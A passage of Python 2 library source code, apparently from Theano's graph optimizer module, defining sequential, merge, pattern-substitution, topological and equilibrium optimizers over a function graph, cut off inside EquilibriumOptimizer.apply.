return id(self) != id(other)
def __str__(self):
return "SeqOpt(%s)" % list.__str__(self)
def __repr__(self):
return list.__repr__(self)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, 'name', None)
print >> stream, "%s%s %s id=%i" % (
(' ' * level), self.__class__.__name__, name, id(self))
# This way, -1 will do all depth
if depth != 0:
depth -= 1
for opt in self:
opt.print_summary(stream, level=(level + 2), depth=depth)
@staticmethod
def print_profile(stream, prof, level=0):
(opts, prof, validate_time, nb_node_before,
nb_node_after, sub_profs) = prof
blanc = (' ' * level)
print >> stream, blanc, "SeqOptimizer",
if hasattr(opts, "name"):
print >> stream, blanc, opts.name,
elif hasattr(opts, "__name__"):
print >> stream, blanc, opts.__name__,
print >> stream, (" time %.3fs for %d/%d nodes"
" before/after optimization" % (
sum(prof), nb_node_before, nb_node_after))
print >> stream, blanc, " %.3fs for fgraph.validate()" % (validate_time)
if level == 0:
print >> stream, blanc, " time - (name, class, index)"
ll = []
for opt in opts:
if hasattr(opt, "__name__"):
ll.append((opt.__name__, opt.__class__.__name__,
opts.index(opt)))
else:
ll.append((opt.name, opt.__class__.__name__,
opts.index(opt)))
lll = zip(prof, ll)
def cmp(a, b):
if a[0] == b[0]:
return 0
elif a[0] < b[0]:
return -1
return 1
lll.sort(cmp)
for (t, opt) in lll[::-1]:
#if t < 1:
# continue
print >> stream, blanc, ' %.6fs - %s' % (t, opt)
if sub_profs[opt[-1]]:
opts[opt[-1]].print_profile(stream, sub_profs[opt[-1]],
level=level + 1)
print >> stream
@staticmethod
def merge_profile(prof1, prof2):
"""
Merge 2 profiles returned by this cass apply() fct.
"""
new_t = []
new_l = []
new_sub_profile = []
#merge common(same object) opt
for l in set(prof1[0]).intersection(set(prof2[0])):
idx1 = prof1[0].index(l)
idx2 = prof2[0].index(l)
new_t.append(prof1[1][idx1] +
prof2[1][idx2])
new_l.append(l)
if hasattr(l, 'merge_profile'):
assert len(prof1[5][idx1]) == len(prof2[5][idx1])
new_sub_profile.append(l.merge_profile(prof1[5][idx1],
prof2[5][idx2]))
else:
new_sub_profile.append(None)
# merge not common opt
import StringIO
for l in set(prof1[0]).symmetric_difference(set(prof2[0])):
#The set trick above only work for the same object optimization
#It don't work for equivalent optimization.
#So we try to merge equivalent optimization here.
new_l_names = [o.name for o in new_l]
if l.name in new_l_names:
idx = new_l_names.index(l.name)
io1 = StringIO.StringIO()
io2 = StringIO.StringIO()
l.print_summary(io1)
new_l[idx].print_summary(io2)
if io1.read() == io2.read():
if l in prof1[0]:
p = prof1
else:
p = prof2
new_t[idx] += p[1][p[0].index(l)]
if hasattr(l, 'merge_profile'):
assert len(p[5][p[0].index(l)]) == len(new_sub_profile[idx])
new_sub_profile[idx] = l.merge_profile(
new_sub_profile[idx], p[5][p[0].index(l)])
else:
new_sub_profile[idx] = None
continue
if l in prof1[0]:
p = prof1
else:
p = prof2
new_t.append(p[1][p[0].index(l)])
idx = p[0].index(l)
new_l.append(l)
new_sub_profile.append(p[5][idx])
new_opt = SeqOptimizer(*new_l)
assert set(prof1[0]).issubset(set(new_l))
# assert set(prof2[0]).issubset(set(new_l))
assert len(new_t) == len(new_opt) == len(new_sub_profile)
return (new_opt, new_t, prof1[2] + prof2[2],
-1, -1, new_sub_profile)
class _metadict:
"""WRITEME"""
# dict that accepts unhashable keys
# uses an associative list
# for internal use only
def __init__(self):
self.d = {}
self.l = []
def __getitem__(self, item):
return self.get(item, None)
def __setitem__(self, item, value):
try:
self.d[item] = value
except Exception:
for i, (key, val) in enumerate(self.l):
if key == item:
self.l[i] = (item, value)
return
self.l.append((item, value))
def __delitem__(self, item):
if item in self.d:
del self.d[item]
else:
for i, (key, val) in enumerate(self.l):
if key == item:
del self.l[i]
return
raise KeyError(item)
def discard(self, item):
if item in self.d:
del self.d[item]
else:
for i, (key, val) in enumerate(self.l):
if key == item:
del self.l[i]
return
def get(self, item, default):
try:
return self.d[item]
except Exception:
for item2, value in self.l:
try:
if item == item2:
return value
if item.equals(item2):
return value
except Exception:
if item is item2:
return value
else:
return default
def clear(self):
self.d = {}
self.l = []
def __str__(self):
return "(%s, %s)" % (self.d, self.l)
class MergeFeature(object):
"""
Keeps track of variables in fgraph that cannot be merged together.
That way, the MergeOptimizer can remember the result of the last merge
pass on the fgraph.
"""
def on_attach(self, fgraph):
assert not hasattr(fgraph, 'merge_feature')
fgraph.merge_feature = self
## For constants
self.seen_constants = set()
# variable -> signature (for constants)
self.const_sig = _metadict()
# signature -> variable (for constants)
self.const_sig_inv = _metadict()
## For all variables
# Set of distinct (not mergeable) nodes
self.nodes_seen = set()
# Each element of scheduled is a list of list of (out, new_out) pairs.
# Each list of pairs represent the substitution needed to replace all
# the outputs of a node with the outputs of a replacement candidate.
# Each node can have several candidates. For instance, if "node" has
# 2 outputs, and there are 3 replacement candidates, we will have:
# shelf.scheduled = [
# [[(node.out1, cand1.out1), (node.out2, cand1.out2)],
# [(node.out1, cand2.out1), (node.out2, cand2.out2)],
# [(node.out1, cand3.out1), (node.out2, cand3.out2)]]]
self.scheduled = []
# List of (node, candidate) pairs, where we tried to replace node by
# candidate, but it failed. This is used to avoid infinite loops
# during the replacement phase.
self.blacklist = []
for node in fgraph.toposort():
self.on_import(fgraph, node)
def on_change_input(self, fgraph, node, i, r, new_r):
# If inputs to node change, it is not guaranteed that it is distinct
# from the other nodes in nodes_seen
if node in self.nodes_seen:
self.nodes_seen.discard(node)
self.process_node(fgraph, node)
if isinstance(new_r, graph.Constant):
self.process_constant(fgraph, new_r)
def on_import(self, fgraph, node):
for c in node.inputs:
if isinstance(c, graph.Constant):
self.process_constant(fgraph, c)
self.process_node(fgraph, node)
def on_prune(self, fgraph, node):
self.nodes_seen.discard(node)
for c in node.inputs:
if isinstance(c, graph.Constant) and (len(c.clients) <= 1):
# This was the last node using this constant
sig = self.const_sig[c]
self.const_sig.discard(c)
self.const_sig_inv.discard(sig)
self.seen_constants.discard(id(c))
def process_constant(self, fgraph, c):
"""Check if a constant can be merged, and queue that replacement"""
if id(c) in self.seen_constants:
return
sig = c.signature()
other_c = self.const_sig_inv.get(sig, None)
if other_c is not None:
# multiple names will clobber each other..
# we adopt convention to keep the last name
if c.name:
other_c.name = c.name
self.scheduled.append([[(c, other_c)]])
else:
#this is a new constant
self.const_sig[c] = sig
self.const_sig_inv[sig] = c
self.seen_constants.add(id(c))
def process_node(self, fgraph, node):
"""Check if a node can be merged, and queue that replacement."""
if node in self.nodes_seen:
return
# These asserts ensure that the fgraph has set the clients field properly.
# The clients should at least contain `node` itself!
if node.inputs:
assert len(node.inputs[0].clients) > 0
assert (node, 0) in node.inputs[0].clients
merge_candidates = [c for (c, i) in node.inputs[0].clients
if c in self.nodes_seen]
else:
merge_candidates = []
replacement_candidates = []
for candidate in merge_candidates:
if candidate is node:
continue
if len(node.inputs) != len(candidate.inputs):
continue
inputs_match = all(node_in is cand_in
for node_in, cand_in in zip(node.inputs, candidate.inputs))
if inputs_match and node.op == candidate.op:
if (node, candidate) in self.blacklist:
# They were already tried, and there was an error
continue
# Schedule transfer of clients from node to candidate
pairs = zip(node.outputs, candidate.outputs)
#transfer names
for node_output, cand_output in pairs:
#clobber old name with new one
#it's arbitrary... one of the names has to go
if node_output.name:
cand_output.name = node_output.name
replacement_candidates.append(pairs)
if replacement_candidates:
self.scheduled.append(replacement_candidates)
else:
self.nodes_seen.add(node)
class MergeOptimizer(Optimizer):
"""
Merges parts of the graph that are identical and redundant.
The basic principle is that if two Applies have ops that compare equal, and
identical inputs, then they do not both need to be computed. The clients of
one are transferred to the other and one of them is removed from the graph.
This procedure is carried out in input->output order through the graph.
The first step of merging is constant-merging, so that all clients of an
int(1) for example, are transferred to a particular instance of int(1).
"""
def add_requirements(self, fgraph):
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
if not hasattr(fgraph, 'merge_feature'):
fgraph.attach_feature(MergeFeature())
def apply(self, fgraph):
# Constant and non-constant are now applied in the same phase.
# I am not sure why, but it seems to be faster this way.
sched = fgraph.merge_feature.scheduled
while sched:
pairs_list = sched.pop()
success = True
for pairs in pairs_list:
try:
fgraph.replace_all_validate(pairs, 'Merge')
except InconsistencyError:
success = False
fgraph.merge_feature.blacklist.append(
(pairs[0][0].owner, pairs[0][1].owner))
if success:
break
# clear blacklist
fgraph.merge_feature.blacklist = []
merge_optimizer = MergeOptimizer()
def is_same_graph_with_merge(var1, var2, givens=None):
"""
Merge-based implementation of `theano.gof.graph.is_same_graph`.
See help on `theano.gof.graph.is_same_graph` for additional documentation.
"""
if givens is None:
givens = {}
# Copy variables since the MergeOptimizer will modify them.
copied = copy.deepcopy([var1, var2, givens])
vars = copied[0:2]
givens = copied[2]
# Create FunctionGraph.
inputs = theano.gof.graph.inputs(vars)
fgraph = theano.gof.fg.FunctionGraph(inputs, vars)
# Perform Variable substitution.
for to_replace, replace_by in givens.iteritems():
fgraph.replace(to_replace, replace_by)
# Perform merge optimization.
merge_optimizer.optimize(fgraph)
# When two variables perform the same computations, they will have the same
# owner in the optimized graph.
# We need to be careful with the special case where the owner is None,
# which happens when the graph is made of a single Variable.
# We also need to make sure we replace a Variable if it is present in
# `givens`.
vars_replaced = [givens.get(v, v) for v in vars]
o1, o2 = [v.owner for v in vars_replaced]
if o1 is None and o2 is None:
# Comparing two single-Variable graphs: they are equal if they are
# the same Variable.
return vars_replaced[0] == vars_replaced[1]
else:
return o1 is o2
def MergeOptMerge(opt):
"""WRITEME
Returns an Optimizer that merges the graph then applies the
optimizer in opt and then merges the graph again in case the
opt introduced additional similarities.
"""
merger = merge_optimizer
opt = SeqOptimizer([merger, opt, merger])
opt.name = "MergeOptMerge"
return opt
def pre_constant_merge(vars):
"""
Merge constants in the subgraph used to compute nodes in `vars`.
`vars` is a list of nodes, and we want to merge together nodes
that are constant inputs used to compute nodes in that list.
:note: This function will ignore nodes that are in an fgraph.
It is used to pre-merge nodes generated inside an optimization,
before it is inserted in the fgraph.
It is useful if there are many such replacements to make,
so that DebugMode will not check each of them.
"""
seen_var = set()
# signature -> variable (for constants)
const_sig_inv = {}
def recursive_merge(var):
if var in seen_var:
return var
if not hasattr(var, 'owner'):
return var
if var.owner and hasattr(var.owner, "fgraph"):
return var
seen_var.add(var)
if isinstance(var, graph.Constant):
sig = var.signature()
if sig in const_sig_inv:
return const_sig_inv[sig]
const_sig_inv[sig] = var
return var
if var.owner:
for idx, inp in enumerate(var.owner.inputs):
var.owner.inputs[idx] = recursive_merge(inp)
return var
return map(recursive_merge, vars)
########################
### Local Optimizers ###
########################
class LocalOptimizer(object):
"""A class for node-based optimizations.
Instances should implement the transform function,
and be passed to configure a fgraph-based Optimizer instance.
"""
def __hash__(self):
if not hasattr(self, '_optimizer_idx'):
self._optimizer_idx = _optimizer_idx[0]
_optimizer_idx[0] += 1
return self._optimizer_idx
def transform(self, node):
"""Transform a subgraph whose output is `node`.
Subclasses should implement this function so that it returns one of two
kinds of things:
- False to indicate that no optimization can be applied to this `node`;
or
- <list of variables> to use in place of `node`'s outputs in the
greater graph.
:type node: an Apply instance
"""
raise utils.MethodNotDefined("transform",
type(self), self.__class__.__name__)
def add_requirements(self, fgraph):
"""
If this local optimization wants to add some requirements to the fgraph,
This is the place to do it.
"""
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
pass
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
(' ' * level), self.__class__.__name__, id(self))
class FromFunctionLocalOptimizer(LocalOptimizer):
"""WRITEME"""
def __init__(self, fn, tracks=None):
if tracks is None:
tracks = []
self.transform = fn
self._tracks = tracks
def tracks(self):
return self._tracks
def __str__(self):
return getattr(self, '__name__',
'<FromFunctionLocalOptimizer instance>')
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
' ' * level,
str(self.transform),
id(self))
def local_optimizer(*tracks):
def decorator(f):
"""WRITEME"""
rval = FromFunctionLocalOptimizer(f, tracks)
rval.__name__ = f.__name__
return rval
return decorator
class LocalOptGroup(LocalOptimizer):
"""WRITEME"""
def __init__(self, *optimizers):
self.opts = optimizers
self.reentrant = any(getattr(opt, 'reentrant', True)
for opt in optimizers)
self.retains_inputs = all(getattr(opt, 'retains_inputs', False)
for opt in optimizers)
def __str__(self):
return getattr(self, '__name__',
('<theano.gof.opt.LocalOptGroup instance>'
+ str([str(o) for o in self.opts])))
def transform(self, node):
for opt in self.opts:
repl = opt.transform(node)
if repl:
return repl
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s id=%i" % (
(' ' * level), self.__class__.__name__, id(self))
if depth != 0:
depth -= 1
for lopt in self.opts:
lopt.print_summary(stream, level=(level + 2), depth=depth)
class _LocalOpKeyOptGroup(LocalOptGroup):
"""WRITEME"""
def __init__(self, optimizers):
if any(not hasattr(opt, 'op_key'), optimizers):
raise TypeError("All LocalOptimizers passed here must have an op_key method.")
CompositeLocalOptimizer.__init__(self, optimizers)
def op_key(self):
return [opt.op_key() for opt in self.opts]
class OpSub(LocalOptimizer):
"""WRITEME
Replaces the application of a certain op by the application of
another op that take the same inputs as what they are replacing.
e.g. OpSub(add, sub) ==>
add(div(x, y), add(y, x)) -> sub(div(x, y), sub(y, x))
"""
# an OpSub does not apply to the nodes it produces
reentrant = False
# all the inputs of the original node are transferred to the outputs
retains_inputs = True
def __init__(self, op1, op2, transfer_tags=True):
"""
op1.make_node and op2.make_node must take the same number of
inputs and have the same number of outputs.
"""
self.op1 = op1
self.op2 = op2
self.transfer_tags = transfer_tags
def op_key(self):
return self.op1
def tracks(self):
return [[self.op1]]
def transform(self, node):
if node.op != self.op1:
return False
repl = self.op2.make_node(*node.inputs)
if self.transfer_tags:
repl.tag = copy.copy(node.tag)
for output, new_output in zip(node.outputs, repl.outputs):
new_output.tag = copy.copy(output.tag)
return repl.outputs
def __str__(self):
return "%s -> %s" % (self.op1, self.op2)
class OpRemove(LocalOptimizer):
"""WRITEME
Removes all applications of an op by transferring each of its
outputs to the corresponding input.
"""
reentrant = False # no nodes are added at all
def __init__(self, op):
self.op = op
def op_key(self):
return self.op
def tracks(self):
return [[self.op]]
def transform(self, node):
if node.op != self.op:
return False
return node.inputs
def __str__(self):
return "%s(x) -> x" % (self.op)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s(%s) id=%i" % (
' ' * level,
self.__class__.__name__,
str(self.op),
id(self))
class PatternSub(LocalOptimizer):
"""WRITEME
@todo update
Replaces all occurrences of the input pattern by the output pattern:
input_pattern ::= (op, <sub_pattern1>, <sub_pattern2>, ...)
input_pattern ::= dict(pattern = <input_pattern>,
constraint = <constraint>)
sub_pattern ::= input_pattern
sub_pattern ::= string
sub_pattern ::= a Constant instance
sub_pattern ::= int
sub_pattern ::= float
constraint ::= lambda fgraph, expr: additional matching condition
output_pattern ::= (op, <output_pattern1>, <output_pattern2>, ...)
output_pattern ::= string
output_pattern ::= int
output_pattern ::= float
Each string in the input pattern is a variable that will be set to
whatever expression is found in its place. If the same string is
used more than once, the same expression must be found in those
places. If a string used in the input pattern is used in the
output pattern, the matching expression will be inserted in its
place. The input pattern cannot just be a string but the output
pattern can.
If you put a constant variable in the input pattern, there will be a
match iff a constant variable with the same value and the same type
is found in its place.
You can add a constraint to the match by using the dict(...) form
described above with a 'constraint' key. The constraint must be a
function that takes the fgraph and the current Variable that we are
trying to match and returns True or False according to an
arbitrary criterion.
Examples:
PatternSub((add, 'x', 'y'), (add, 'y', 'x'))
PatternSub((multiply, 'x', 'x'), (square, 'x'))
PatternSub((subtract, (add, 'x', 'y'), 'y'), 'x')
PatternSub((power, 'x', Constant(double, 2.0)), (square, 'x'))
PatternSub((boggle, {'pattern': 'x',
'constraint': lambda expr: expr.type == scrabble}),
(scrabble, 'x'))
"""
def __init__(self, in_pattern, out_pattern, allow_multiple_clients=False,
skip_identities_fn=None, name=None, pdb=False):
"""
Creates a PatternSub that replaces occurrences of
in_pattern by occurrences of out_pattern.
:param in_pattern: the input pattern that we want to replace
:param out_pattern: the replacement pattern
:param allow_multiple_clients: if False, the pattern matching will fail
if one of the subpatterns has more than
one client.
:param pdb: if True, we invoke pdb when the first node in the
pattern match.
"""
self.in_pattern = in_pattern
self.out_pattern = out_pattern
if isinstance(in_pattern, (list, tuple)):
self.op = self.in_pattern[0]
elif isinstance(in_pattern, dict):
self.op = self.in_pattern['pattern'][0]
else:
raise TypeError("The pattern to search for must start with "
"a specific Op instance.")
self.__doc__ = (self.__class__.__doc__
+ "\n\nThis instance does: "
+ str(self) + "\n")
self.allow_multiple_clients = allow_multiple_clients
self.skip_identities_fn = skip_identities_fn
if name:
self.__name__ = name
self.pdb = pdb
def skip_identities(self, expr):
if self.skip_identities_fn:
return self.skip_identities_fn(expr)
def op_key(self):
return self.op
def tracks(self):
def helper(pattern, sofar):
if isinstance(pattern, (list, tuple)):
sofar = sofar + (pattern[0],)
return reduce(tuple.__add__,
tuple(helper(p, sofar) for p in pattern[1:]),
())
elif isinstance(pattern, dict):
return helper(pattern['pattern'], sofar)
else:
return (sofar,)
return set(helper(self.in_pattern, ()))
def transform(self, node):
"""
Checks if the graph from node corresponds to in_pattern. If it does,
constructs out_pattern and performs the replacement.
"""
if node.op != self.op:
return False
def match(pattern, expr, u, allow_multiple_clients=False, pdb=False):
def retry_with_equiv():
expr_equiv = self.skip_identities(expr)
if expr_equiv is None:
return False
#TODO: Not sure how to handle multiple_clients flag
###print 'retrying match', pattern, expr_equiv
return match(pattern, expr_equiv, u,
allow_multiple_clients=allow_multiple_clients)
if isinstance(pattern, (list, tuple)):
if expr.owner is None:
return False
if (not (expr.owner.op == pattern[0])
or (not allow_multiple_clients
and len(expr.clients) > 1)):
return retry_with_equiv()
if len(pattern) - 1 != len(expr.owner.inputs):
return retry_with_equiv()
for p, v in zip(pattern[1:], expr.owner.inputs):
u = match(p, v, u, self.allow_multiple_clients)
if not u:
return False
elif isinstance(pattern, dict):
try:
real_pattern = pattern['pattern']
except KeyError:
raise KeyError(
"Malformed pattern: %s (expected key 'pattern')"
% pattern)
constraint = pattern.get('constraint', lambda expr: True)
if constraint(expr):
return match(real_pattern, expr, u,
pattern.get('allow_multiple_clients',
allow_multiple_clients))
else:
return retry_with_equiv()
elif isinstance(pattern, basestring):
v = unify.Var(pattern)
if u[v] is not v and u[v] is not expr:
return retry_with_equiv()
else:
u = u.merge(expr, v)
elif (isinstance(pattern, (int, float))
and isinstance(expr, graph.Constant)):
if numpy.all(
theano.tensor.constant(pattern).value == expr.value):
return u
else:
return retry_with_equiv()
elif (isinstance(pattern, graph.Constant)
and isinstance(expr, graph.Constant)
and pattern.equals(expr)):
return u
else:
return retry_with_equiv()
if pdb:
import pdb
pdb.set_trace()
return u
def build(pattern, u):
if isinstance(pattern, (list, tuple)):
args = [build(p, u) for p in pattern[1:]]
return pattern[0](*args)
elif isinstance(pattern, basestring):
return u[unify.Var(pattern)]
elif isinstance(pattern, (int, float)):
return pattern
else:
return pattern.clone()
u = match(self.in_pattern, node.out, unify.Unification(), True,
self.pdb)
if u:
p = self.out_pattern
new = build(p, u)
####print "PatternSub matched:", new
return [new]
else:
return False
def __str__(self):
if getattr(self, '__name__', None):
return self.__name__
def pattern_to_str(pattern):
if isinstance(pattern, (list, tuple)):
return "%s(%s)" % (
str(pattern[0]),
", ".join([pattern_to_str(p) for p in pattern[1:]]))
elif isinstance(pattern, dict):
return "%s subject to %s" % (
pattern_to_str(pattern['pattern']),
str(pattern.get('constraint', 'no conditions')))
else:
return str(pattern)
return "%s -> %s" % (
pattern_to_str(self.in_pattern),
pattern_to_str(self.out_pattern))
def __repr__(self):
return str(self)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
name = getattr(self, '__name__', getattr(self, 'name', None))
print >> stream, "%s%s %s(%s, %s) id=%i" % (
' ' * level,
self.__class__.__name__,
name,
str(self.in_pattern),
str(self.out_pattern),
id(self))
##################
### Navigators ###
##################
# Use the following classes to apply LocalOptimizers
class NavigatorOptimizer(Optimizer):
"""Abstract class
"""
@staticmethod
def warn(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer: print traceback
"""
_logger.error("Optimization failure due to: %s" % str(local_opt))
_logger.error("TRACEBACK:")
_logger.error(traceback.format_exc())
if isinstance(exc, AssertionError) or config.on_opt_error == 'raise':
raise exc
@staticmethod
def warn_inplace(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer
ignore InconsistencyErrors, print traceback
"""
if isinstance(exc, InconsistencyError):
return
return NavigatorOptimizer.warn(exc, nav, repl_pairs, local_opt)
@staticmethod
def warn_ignore(exc, nav, repl_pairs, local_opt):
"""failure_callback for NavigatorOptimizer: ignore all errors
"""
pass
def __init__(self, local_opt, ignore_newtrees='auto',
failure_callback=None):
"""
:param local_opt: a LocalOptimizer to apply over a FunctionGraph
(or None is Ok too).
:param ignore_newtrees:
- True: new subgraphs returned by an optimization is not a
candidate for optimization
- False: new subgraphs returned by an optimization is a candidate
for optimization
- 'auto': let the local_opt set this parameter via its 'reentrant'
attribute.
:param failure_callback:
a function that takes (exception, navigator, [(old, new),
(old,new),...]) and we call it if there's an exception.
If the trouble is from local_opt.transform(), the new variables
will be 'None'.
If the trouble is from validation (the new types don't match for
example) then the new variables will be the ones created by
transform().
If this parameter is None, then exceptions are not caught here
(raised normally).
"""
self.local_opt = local_opt
if ignore_newtrees == 'auto':
self.ignore_newtrees = not getattr(local_opt, 'reentrant', True)
else:
self.ignore_newtrees = ignore_newtrees
self.failure_callback = failure_callback
def attach_updater(self, fgraph, importer, pruner, chin=None):
"""
Install some FunctionGraph listeners to help the navigator deal with the
ignore_trees-related functionality.
:param importer: function that will be called whenever when
optimizations add stuff to the graph.
:param pruner: function to be called when optimizations remove stuff
from graph.
:param chin: "on change input" called whenever an node's inputs change.
:returns: The FunctionGraph plugin that handles the three tasks.
Keep this around so that you can detach later!
"""
if self.ignore_newtrees:
importer = None
if importer is None and pruner is None:
return None
class Updater:
if importer is not None:
def on_import(self, fgraph, node):
importer(node)
if pruner is not None:
def on_prune(self, fgraph, node):
pruner(node)
if chin is not None:
def on_change_input(self, fgraph, node, i, r, new_r):
chin(node, i, r, new_r)
u = Updater()
fgraph.attach_feature(u)
return u
def detach_updater(self, fgraph, u):
"""Undo the work of attach_updater.
:param u: a return-value of attach_updater
:returns: None.
"""
if u is not None:
fgraph.remove_feature(u)
def process_node(self, fgraph, node, lopt=None):
"""
This function will use `lopt` to `transform` the `node`. The
`transform` method will return either False or a list of Variables
that are intended to replace `node.outputs`.
If the fgraph accepts the replacement, then the optimization is
successful, and this function returns True.
If there are no replacement candidates or the fgraph rejects the
replacements, this function returns False.
:param fgraph: a FunctionGraph
:param node: an Apply instance in `fgraph`
:param lopt: a LocalOptimizer instance that may have a better idea for
how to compute node's outputs.
:rtype: Bool
:returns: True iff the `node`'s outputs were replaced in the `fgraph`.
"""
lopt = lopt or self.local_opt
try:
replacements = lopt.transform(node)
except Exception, e:
if self.failure_callback is not None:
self.failure_callback(e, self,
[(x, None) for x in node.outputs], lopt)
return False
else:
raise
if replacements is False or replacements is None:
return False
if not isinstance(replacements, (tuple, list)):
raise TypeError('Optimizer %s gave wrong type of replacement. '
'Expected list or tuple.' % lopt)
if len(node.outputs) != len(replacements):
raise ValueError('Optimizer %s gave wrong number of replacements'
% lopt)
# If an output would be replaced by itself, no need to perform
# the replacement
repl_pairs = [(r, rnew) for r, rnew in zip(node.outputs, replacements)
if rnew is not r]
if len(repl_pairs) == 0:
return False
try:
fgraph.replace_all_validate(repl_pairs, reason=lopt)
return True
except Exception, e:
# This means the replacements were rejected by the fgraph.
#
# This is not supposed to happen. The default failure_callback
# will print a traceback as a warning.
if self.failure_callback is not None:
self.failure_callback(e, self, repl_pairs, lopt)
return False
else:
raise
def add_requirements(self, fgraph):
super(NavigatorOptimizer, self).add_requirements(fgraph)
# Added by default
#fgraph.attach_feature(toolbox.ReplaceValidate())
if self.local_opt:
self.local_opt.add_requirements(fgraph)
def print_summary(self, stream=sys.stdout, level=0, depth=-1):
print >> stream, "%s%s (%i)" % (
(' ' * level), self.__class__.__name__, id(self))
if depth != 0:
self.local_opt.print_summary(stream, level=(level + 2),
depth=(depth - 1))
class TopoOptimizer(NavigatorOptimizer):
"""WRITEME"""
def __init__(self, local_opt, order='in_to_out', ignore_newtrees=False,
failure_callback=None):
if order not in ['out_to_in', 'in_to_out']:
raise ValueError("order must be 'out_to_in' or 'in_to_out'")
self.order = order
NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees,
failure_callback)
def apply(self, fgraph, start_from=None):
if start_from is None:
start_from = fgraph.outputs
q = deque(graph.io_toposort(fgraph.inputs, start_from))
def importer(node):
if node is not current_node:
q.append(node)
def pruner(node):
if node is not current_node:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
if self.order == 'out_to_in':
node = q.pop()
else:
node = q.popleft()
current_node = node
self.process_node(fgraph, node)
except Exception:
self.detach_updater(fgraph, u)
raise
self.detach_updater(fgraph, u)
class OpKeyOptimizer(NavigatorOptimizer):
"""WRITEME"""
def __init__(self, local_opt, ignore_newtrees=False,
failure_callback=None):
if not hasattr(local_opt, 'op_key'):
raise TypeError("LocalOptimizer for OpKeyOptimizer must have "
"an 'op_key' method.")
NavigatorOptimizer.__init__(self, local_opt, ignore_newtrees,
failure_callback)
def apply(self, fgraph):
op = self.local_opt.op_key()
if isinstance(op, (list, tuple)):
q = reduce(list.__iadd__, map(fgraph.get_nodes, op))
else:
q = list(fgraph.get_nodes(op))
def importer(node):
if node is not current_node:
if node.op == op:
q.append(node)
def pruner(node):
if node is not current_node and node.op == op:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
node = q.pop()
current_node = node
self.process_node(fgraph, node)
except Exception:
self.detach_updater(fgraph, u)
raise
self.detach_updater(fgraph, u)
def add_requirements(self, fgraph):
"""
Requires the following features:
- NodeFinder
- ReplaceValidate(Added by default)
"""
super(OpKeyOptimizer, self).add_requirements(fgraph)
fgraph.attach_feature(toolbox.NodeFinder())
class ChangeTracker:
def __init__(self):
self.changed = False
def on_import(self, fgraph, node):
self.changed = True
def on_change_input(self, fgraph, node, i, r, new_r):
self.changed = True
def reset(self):
self.changed = False
def on_attach(self, fgraph):
fgraph.change_tracker = self
class EquilibriumOptimizer(NavigatorOptimizer):
def __init__(self,
optimizers,
failure_callback=None,
max_depth=None,
max_use_ratio=None):
"""
:param optimizers: list or set of local or global optimizations to
apply until equilibrium.
:param max_use_ratio: each optimizer can be applied at most
(size of graph * this number) times
:param max_depth: TODO what does this do? (EquilibriumDB sets it to 5)
"""
super(EquilibriumOptimizer, self).__init__(
None,
ignore_newtrees=True,
failure_callback=failure_callback)
self.local_optimizers = []
self.global_optimizers = []
for opt in optimizers:
if isinstance(opt, LocalOptimizer):
self.local_optimizers.append(opt)
else:
self.global_optimizers.append(opt)
self.max_depth = max_depth
self.max_use_ratio = max_use_ratio
assert self.max_use_ratio is not None, (
'max_use_ratio has to be a number')
def add_requirements(self, fgraph):
super(EquilibriumOptimizer, self).add_requirements(fgraph)
fgraph.attach_feature(ChangeTracker())
for opt in self.local_optimizers:
opt.add_requirements(fgraph)
for opt in self.global_optimizers:
opt.add_requirements(fgraph)
def apply(self, fgraph, start_from=None):
if start_from is None:
start_from = fgraph.outputs
changed = True
max_use_abort = False
opt_name = None
process_count = {}
max_nb_nodes = 0
loop_timing = []
global_opt_timing = []
time_lopts = {}
io_toposort_timing = []
nb_nodes = []
for lopt in self.local_optimizers:
process_count.setdefault(lopt, 0)
time_lopts.setdefault(lopt, 0)
while changed and not max_use_abort:
t0 = time.time()
changed = False
#apply global optimizer
fgraph.change_tracker.reset()
for gopt in self.global_optimizers:
gopt.apply(fgraph)
if fgraph.change_tracker.changed:
changed = True
global_opt_timing.append(float(time.time() - t0))
#apply local optimizer
for node in start_from:
assert node in fgraph.outputs
topo_t0 = time.time()
q = deque(graph.io_toposort(fgraph.inputs, start_from))
io_toposort_timing.append(time.time() - topo_t0)
nb_nodes.append(len(q))
max_nb_nodes = max(max_nb_nodes, len(q))
max_use = max_nb_nodes * self.max_use_ratio
def importer(node):
if node is not current_node:
q.append(node)
def pruner(node):
if node is not current_node:
try:
q.remove(node)
except ValueError:
pass
u = self.attach_updater(fgraph, importer, pruner)
try:
while q:
node = q.pop()
current_node = node
for lopt in self.local_optimizers:
t_lopt = time.time()
lopt_change = self.process_node(fgraph, node, lopt)
time_lopts[lopt] += time.time() - t_lopt
if lopt_change:
process_count[lopt] += 1
changed = True
if process_count[lopt] > max_use:
max_use_abort = True
opt_name = (getattr(lopt, "name", None)
or getattr(lopt, "__name__", ""))
if node not in fgraph.apply_nodes:
# go to next node
break
finally:
self.detach_updater(fgraph, u)
loop_timing.append(float(time.time() - t0))
if max_use_abort:
_logger.error("EquilibriumOptimizer max'ed out by '%s'" % opt_name
+ ". You can safely raise the current threshold of "
+ "%f with the theano flag 'optdb.max_use_ratio'." %
config.optdb.max_use_ratio)
if config.time_eq_optimizer:
print "EquilibriumOptimizer",
print getattr(self, "name", getattr(self, "__name__", ""))
print " time %.3fs for %d passes, %d nodes max" % (
sum(loop_timing), len(loop_timing), max_nb_nodes)
for i in range(len(loop_timing)):
print '%d - %.3fs (%.3fs in global opts) - %d nodes' % (
i, loop_timing[i], global_opt_timing[i], nb_nodes[i])
print
count_opt = []
for opt, count in process_count.iteritems():
if count > 0:
count_opt.append((count, opt))
if count_opt:
print 'times applied - optimizer:'
count_opt.sort()
for (count, opt) in count_opt[::-1]:
print ' %d - %s' % (count, opt)
